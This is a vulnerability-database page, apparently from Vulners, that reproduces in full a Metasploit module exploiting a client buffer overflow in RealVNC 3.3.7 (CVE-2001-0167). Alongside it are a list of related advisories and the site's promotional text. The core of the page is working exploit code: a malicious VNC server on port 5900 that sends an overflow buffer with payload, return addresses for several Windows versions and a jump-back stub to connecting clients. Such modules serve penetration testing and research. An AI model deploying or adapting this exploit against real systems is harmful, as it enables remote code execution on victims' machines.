Lucene search
K

RealVNC 3.3.7 Client Buffer Overflow

🗓️ 14 Dec 2006 19:41:37Reported by MC <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 32 Views

RealVNC 3.3.7 Client Buffer Overflow exploi

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2001-0167
30 Apr 201000:00
circl
Core Security
ATT VNC Windows Client Buffer Overflow
1 Jan 197600:00
coresecurity
CVE
CVE-2001-0167
9 Mar 200105:00
cve
Cvelist
CVE-2001-0167
9 Mar 200105:00
cvelist
Exploit DB
RealVNC 3.3.7 - Client Buffer Overflow (Metasploit)
30 Apr 201000:00
exploitdb
NVD
CVE-2001-0167
3 May 200104:00
nvd
Packet Storm
RealVNC 3.3.7 Client Buffer Overflow
26 Nov 200900:00
packetstorm
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::TcpServer

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'RealVNC 3.3.7 Client Buffer Overflow',
      'Description'    => %q{
        This module exploits a buffer overflow in RealVNC 3.3.7 (vncviewer.exe).
      },
      'Author'         => 'MC',
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2001-0167' ],
          [ 'OSVDB', '6281' ],
          [ 'BID', '2305' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          'Space'    => 500,
          'BadChars' => "\x00\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40",
          'MaxNops'  => 0,
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows 2000 SP4 English',	{ 'Ret' => 0x7c2ec68b } ],
          [ 'Windows XP SP2 English',	{ 'Ret' => 0x77dc15c0 } ],
          [ 'Windows 2003 SP1 English',	{ 'Ret' => 0x76aa679b } ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2001-01-29',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptPort.new('SRVPORT', [ true, "The VNCServer daemon port to listen on", 5900 ])
      ])
  end

  def on_client_connect(client)

    rfb = "RFB 003.003\n"

    client.put(rfb)
  end

  def on_client_data(client)
    return if ((p = regenerate_payload(client)) == nil)

    filler = make_nops(993 - payload.encoded.length)

    sploit =  "\x00\x00\x00\x00\x00\x00\x04\x06" + filler + payload.encoded
    sploit << [target.ret].pack('V') + make_nops(10) + [0xe8, -457].pack('CV')
    sploit << rand_text_english(200)

    print_status("Sending #{sploit.length} bytes to #{client.getpeername}:#{client.peerport}...")
    client.put(sploit)

    handler
    service.close_client(client)
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Oct 2020 20:00Current
7.5High risk
Vulners AI Score7.5
CVSS 27.6
EPSS0.50813
32